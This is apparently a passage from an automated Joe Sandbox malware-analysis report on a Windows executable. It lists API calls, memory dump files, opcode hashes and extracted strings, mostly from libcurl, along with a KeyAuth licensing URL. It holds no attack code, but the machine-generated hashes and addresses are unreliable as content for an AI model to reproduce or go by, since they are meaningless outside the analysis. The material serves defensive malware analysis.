                                            • Instruction Fuzzy Hash: D922C562A1CB8985EB10EBA8E4543EDA761FF45BA4F805233DA5D86AD5DF7CE080C311
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy
                                            • String ID: array$number overflow parsing '$object
                                            • API String ID: 1346393832-579821726
                                            • Opcode ID: ad25c7a86437acde071c81594076c447ca3aaed47a1884f3f9ceb8d8117a9dab
                                            • Instruction ID: 93d7b5d4fb7190f0b9ad278957f1c0e3d7669c9912cef5cdc2ad65b6226103bd
                                            • Opcode Fuzzy Hash: ad25c7a86437acde071c81594076c447ca3aaed47a1884f3f9ceb8d8117a9dab
                                            • Instruction Fuzzy Hash: 6212C662B1CB8985EB00EB68E4543EDA761FF41BA4F905232DA5D97AE9DF7CD080C311
                                            APIs
                                              • Part of subcall function 00007FF7E59F5730: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E59FFD30,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7E59F1B61), ref: 00007FF7E59F5757
                                              • Part of subcall function 00007FF7E59F5730: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF7E59FFD30,?,?,?,?,?,?,?,?,?,?,00000000,00007FF7E59F1B61), ref: 00007FF7E59F5763
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E59FC094
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E59FC09C
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E59FC0C3
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E59FC0CC
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E59FC150
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7E59FC159
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID: 8bit$; boundary=$; filename="$; name="$Content-Disposition$Content-Disposition: %s%s%s%s%s%s%s$Content-Transfer-Encoding$Content-Transfer-Encoding: %s$Content-Type$Content-Type: %s%s%s$application/octet-stream$attachment$form-data$multipart/$multipart/form-data$multipart/mixed$text/plain
                                            • API String ID: 1294909896-1595554923
                                            • Opcode ID: 300bd899a9cef0cdbabd0a11104f44b44084b0c6fc07b8b834b64faa677ac54b
                                            • Instruction ID: 26402ab921cd1701083eef717501fd88208c99bab74597c6eaca506aacedc43b
                                            • Opcode Fuzzy Hash: 300bd899a9cef0cdbabd0a11104f44b44084b0c6fc07b8b834b64faa677ac54b
                                            • Instruction Fuzzy Hash: E9E16E21B0C68A92EA65AF1195207F9A791FF04F84FC88436CF4D87681DF3CE4658772
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID: %s auth using %s with user '%s'$%s:%s$%sAuthorization: Basic %s$Authorization$Authorization:$Authorization: Bearer %s$Basic$Bearer$CONNECT$Digest$NTLM$Negotiate$Proxy$Proxy-$Proxy-authorization$Server
                                            • API String ID: 1294909896-115817326
                                            • Opcode ID: 9d864d28d9e300f388af087b7d8b9fd2095f76582643c860ef49b6a4ced9ffbd
                                            • Instruction ID: f73df4f14e892e081a9429cde2720e84fa1b65431c8355b2518a65a9e66fdc3e
                                            • Opcode Fuzzy Hash: 9d864d28d9e300f388af087b7d8b9fd2095f76582643c860ef49b6a4ced9ffbd
                                            • Instruction Fuzzy Hash: F5919661F0CA9B81FA50AB199670B79AB90EF41F94F944037DA4C87691DF3CE845C322
                                            APIs
                                              • Part of subcall function 00007FF7E59E4310: memcpy.VCRUNTIME140(7FFFFFFFFFFFFFFF,https://keyauth.win/api/1.2/,-3333333333333333,00007FF7E59E1B49), ref: 00007FF7E59E4341
                                            • memcpy.VCRUNTIME140 ref: 00007FF7E59E6486
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF7E59E6518
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF7E59E6559
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E66A3
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E66E2
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E6730
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E6771
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E67CE
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E6888
                                              • Part of subcall function 00007FF7E5A3F1F0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,-3333333333333333,00007FF7E59E43EE,7FFFFFFFFFFFFFFF,https://keyauth.win/api/1.2/,-3333333333333333,00007FF7E59E1B49), ref: 00007FF7E5A3F20A
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E68C9
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E6996
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E69D7
                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7E59E69FA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _invalid_parameter_noinfo_noreturn$memcpy$Concurrency::cancel_current_taskmalloc
                                            • String ID: ; expected $; last read: '$rsing $syntax error $unexpected
                                            • API String ID: 264867259-3075834232
                                            • Opcode ID: 4e1204277121835ebe4e06a958129741cbb2a0c4066216bae6c9bb7d253b311e
                                            • Instruction ID: 03f7b74409a8336fc8192d2d4898886c3765608d80cfe38f2563db93aaef86c6
                                            • Opcode Fuzzy Hash: 4e1204277121835ebe4e06a958129741cbb2a0c4066216bae6c9bb7d253b311e
                                            • Instruction Fuzzy Hash: F512C462F08A4981EB10EB64F4143ADA7A1EB45BE8F805732DA6D937D9DF7CE084C311
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: strchrstrrchr$_strdupstrstr
                                            • String ID: .$/$/$/$?
                                            • API String ID: 2325335452-1821401756
                                            • Opcode ID: 532677097c9836d2ba0a64a8e6dc7d0731298d3760ddfc5c2a40f58a8fc9dc2d
                                            • Instruction ID: 7203f0ecd0606e63232be7968f5b236c918b78cbd4cc0dd82d2df512c0728a4b
                                            • Opcode Fuzzy Hash: 532677097c9836d2ba0a64a8e6dc7d0731298d3760ddfc5c2a40f58a8fc9dc2d
                                            • Instruction Fuzzy Hash: 7281C316B0C28A45FB656721D522B79EFD1AF45F84FC84036CE4E963C6DE3DE8858322
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: strchr$free
                                            • String ID: /D:$/DEFINE:$/FIND:$/LOOKUP:$/M:$/MATCH:$CLIENT libcurl 7.70.0%sQUIT$CLIENT libcurl 7.70.0DEFINE %s %sQUIT$CLIENT libcurl 7.70.0MATCH %s %s %sQUIT$Failed sending DICT request$default$lookup word is missing
                                            • API String ID: 3578582447-31095704
                                            • Opcode ID: 40fc0069801b7dfe2785114d83a4b2d6c3cc27889de5eff3aac2ff71acebb616
                                            • Instruction ID: cd0d0bf6a10967539308fece26cd56bf66c3d009056d740c0183f7797cba08d8
                                            • Opcode Fuzzy Hash: 40fc0069801b7dfe2785114d83a4b2d6c3cc27889de5eff3aac2ff71acebb616
                                            • Instruction Fuzzy Hash: E881BE15B0C68A48FA25AB629571BB9EA81AF45FC4FC84433CD4DD7B85DE3CE941C322
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID:
                                            • API String ID: 1294909896-0
                                            • Opcode ID: 9c8d84b23c23547d3dcbb69ecb8177644d1ee1b27293fab0f9f33d95997fbe09
                                            • Instruction ID: dee05d1fff69b6a7a09fe27fb66342181e500c321641a6026ba1187f0d99c6c4
                                            • Opcode Fuzzy Hash: 9c8d84b23c23547d3dcbb69ecb8177644d1ee1b27293fab0f9f33d95997fbe09
                                            • Instruction Fuzzy Hash: B291E636614B86D3E7499F30E9A06AC7768FB49F48F540136EF9E47354CF34A2A58321
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: memcpystrchrtolower$__stdio_common_vsscanfstrtoul
                                            • String ID: %255[^:]:%d$:%u$@$Added %s:%d:%s to DNS cache$Couldn't parse CURLOPT_RESOLVE entry '%s'!$Couldn't parse CURLOPT_RESOLVE removal entry '%s'!$RESOLVE %s:%d is - old addresses discarded!$RESOLVE %s:%d is wildcard, enabling wildcard checks$Resolve address '%s' found illegal!$]
                                            • API String ID: 1094891576-1753329177
                                            • Opcode ID: 955c7712c79ff587e7c603a986f10185c6f7a27a7aa30e803e5dd7570a33bcd5
                                            • Instruction ID: d8151f0c2948702d5a56d1669dfb1f99881b97dd02f22e7754b6347b77b2311a
                                            • Opcode Fuzzy Hash: 955c7712c79ff587e7c603a986f10185c6f7a27a7aa30e803e5dd7570a33bcd5
                                            • Instruction Fuzzy Hash: DAD19122B2968A45EF51AB31D420BF9AB50FF44B98F844133DA5E876C5DF3CE505D322
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free
                                            • String ID: Unsupported proxy '%s', libcurl is built without the HTTPS-proxy support.$Unsupported proxy scheme for '%s'$Unsupported proxy syntax in '%s'$http$https$socks$socks4$socks4a$socks5$socks5h
                                            • API String ID: 1294909896-874090715
                                            • Opcode ID: a4b04b913e93c2f9c523f7cf3eae0e2690bd5702689a41c3ee2f1092c1171054
                                            • Instruction ID: fa22aba7eecd1357a327ff84c653c2ae6d89540871b979c0c6a0de9539d89895
                                            • Opcode Fuzzy Hash: a4b04b913e93c2f9c523f7cf3eae0e2690bd5702689a41c3ee2f1092c1171054
                                            • Instruction Fuzzy Hash: 66A1C421F1864A81FB50EB61E460FBDAB64BF44F98F84443BCE0D93695DF38E9448362
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: calloc$free$strchrstrncpy$_strdupmallocstrncmpstrrchr
                                            • String ID: Request has same path as previous transfer$Uploading to a URL without a file name!
                                            • API String ID: 2243338858-131330169
                                            • Opcode ID: 9dcf305a52cd3e23aaf1153be538e4d3e6a8ad2efff6f173cfe376763f3954e1
                                            • Instruction ID: 58a5bc9f01f3601199134f9073a9b34dd0ec634d903af1c0b1dea047623363d6
                                            • Opcode Fuzzy Hash: 9dcf305a52cd3e23aaf1153be538e4d3e6a8ad2efff6f173cfe376763f3954e1
                                            • Instruction Fuzzy Hash: C591E325B0C78A82EA54AB25E465B79ABE0FF46F80F944037DA4E93794CF3CD4148723
                                            APIs
                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7E5A010B9,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E59FA403
                                            • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7E5A010B9,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E59FA47D
                                            • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7E5A010B9,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E59FA4A1
                                            • qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7E5A010B9,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E59FA4F0
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7E5A010B9,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E59FA52A
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7E5A010B9,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E59FA53C
                                            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7E5A010B9,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E59FA54F
                                            • _unlink.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7E5A010B9,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E59FA56A
                                            • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7E5A010B9,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E59FA580
                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7E5A010B9,?,?,00000000,00007FF7E5A015F5), ref: 00007FF7E59FA589
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: free$fclose$__acrt_iob_func_unlinkcallocfputsqsort
                                            • String ID: ## Fatal libcurl error$# Netscape HTTP Cookie File# https://curl.haxx.se/docs/http-cookies.html# This file was generated by libcurl! Edit at your own risk.$%s$%s.%s.tmp
                                            • API String ID: 1368378007-4087121635
                                            • Opcode ID: 1f35a80a99e6fd3e0fec7f91074f21a35dd5555525d88da8c92026e8bc2dde98
                                            • Instruction ID: dc645abc57af69ebe74347e8981dfc8319fa36038e5e436bb1e09d9ac639fa44
                                            • Opcode Fuzzy Hash: 1f35a80a99e6fd3e0fec7f91074f21a35dd5555525d88da8c92026e8bc2dde98
                                            • Instruction Fuzzy Hash: 70516421B0964A41EE55AB61A8347BAA690AF45FC4FC84432DD1ECA750DF3CE4558232
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.$Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.$Failed to resolve "%s" for SOCKS4 connect.$Failed to send SOCKS4 connect request.$SOCKS4 communication to %s:%d$SOCKS4 connect to IPv4 %s (locally resolved)$SOCKS4 connection to %s not supported$SOCKS4 non-blocking resolve of %s$SOCKS4 reply has wrong version, version should be 0.$SOCKS4%s request granted.$SOCKS4%s: connecting to HTTP proxy %s port %d$SOCKS4: Failed receiving connect request ack: %s$SOCKS4: too long host name$Too long SOCKS proxy name, can't use!$[
                                            • API String ID: 0-3760664348
                                            • Opcode ID: 6c30f7f6b874b116607d717ff4598b0c656bd0c5a0a8bccfb45bdd3e036cc216
                                            • Instruction ID: 594ac8ecda42fdb7fa8533672596b3e7e34ce0c266dcb26e7da187d6f1368f0f
                                            • Opcode Fuzzy Hash: 6c30f7f6b874b116607d717ff4598b0c656bd0c5a0a8bccfb45bdd3e036cc216
                                            • Instruction Fuzzy Hash: 32E1C3A1B082C985EB54AB25E164779AFA0EF45F84F848137DA4DC7B96CF3CE444C722
                                            APIs
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E55CE
                                            • __std_exception_destroy.VCRUNTIME140 ref: 00007FF7E59E55FC
                                            • __std_exception_destroy.VCRUNTIME140 ref: 00007FF7E59E560A
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E5644
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E5695
                                            • memset.VCRUNTIME140 ref: 00007FF7E59E54C3
                                              • Part of subcall function 00007FF7E59E4310: memcpy.VCRUNTIME140(7FFFFFFFFFFFFFFF,https://keyauth.win/api/1.2/,-3333333333333333,00007FF7E59E1B49), ref: 00007FF7E59E4341
                                              • Part of subcall function 00007FF7E59E6310: memcpy.VCRUNTIME140 ref: 00007FF7E59E6486
                                              • Part of subcall function 00007FF7E59E1FB0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E2121
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E5802
                                            • __std_exception_destroy.VCRUNTIME140 ref: 00007FF7E59E582E
                                            • __std_exception_destroy.VCRUNTIME140 ref: 00007FF7E59E583C
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E5877
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E58CA
                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7E59E59B1
                                            • ?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 00007FF7E59E59C9
                                            • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140 ref: 00007FF7E59E59D6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_destroy$memcpy$?uncaught_exception@std@@D@std@@@std@@Osfx@?$basic_ostream@U?$char_traits@memset
                                            • String ID: value
                                            • API String ID: 2102519606-494360628
                                            • Opcode ID: 023b6053358200f424848e61aa4fa9e49c9a7dc309aec37bbb2a978c88a57a66
                                            • Instruction ID: 335b247206c28f06b5e8548ad5723a5b79dd2f47b62b68394744eb28c72a1360
                                            • Opcode Fuzzy Hash: 023b6053358200f424848e61aa4fa9e49c9a7dc309aec37bbb2a978c88a57a66
                                            • Instruction Fuzzy Hash: BDF1DB22B1C68545EB10EB74E4543EDA7A0FF45BA8F905232D6AD83AE9DF3CD085C711
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2285575037.00007FF7E59E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E59E0000, based on PE: true
                                            • Associated: 00000000.00000002.2285523949.00007FF7E59E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285629226.00007FF7E5A41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285657315.00007FF7E5A58000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2285675119.00007FF7E5A59000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ff7e59e0000_oMBUxRQ4cj.jbxd
                                            Similarity
                                            • API ID: Cert$CertificateCertificatesContextEnumFreeStore
                                            • String ID: ALPN, server did not agree to a protocol$http/1.1$schannel: ALPN, server accepted to use %.*s$schannel: failed to retrieve ALPN result$schannel: failed to retrieve remote cert context$schannel: failed to setup confidentiality$schannel: failed to setup memory allocation$schannel: failed to setup replay detection$schannel: failed to setup sequence detection$schannel: failed to setup stream orientation$schannel: failed to store credential handle
                                            • API String ID: 2572311694-3353508759
                                            • Opcode ID: 003eef28260a4f8df0df00670386984386231f818a0537bbf2c3299004cc96c5
                                            • Instruction ID: 28cb93ad143a2e8faa8973188be0ca6cc51fb7a2e235b1e3954919360ded6196
                                            • Opcode Fuzzy Hash: 003eef28260a4f8df0df00670386984386231f818a0537bbf2c3299004cc96c5
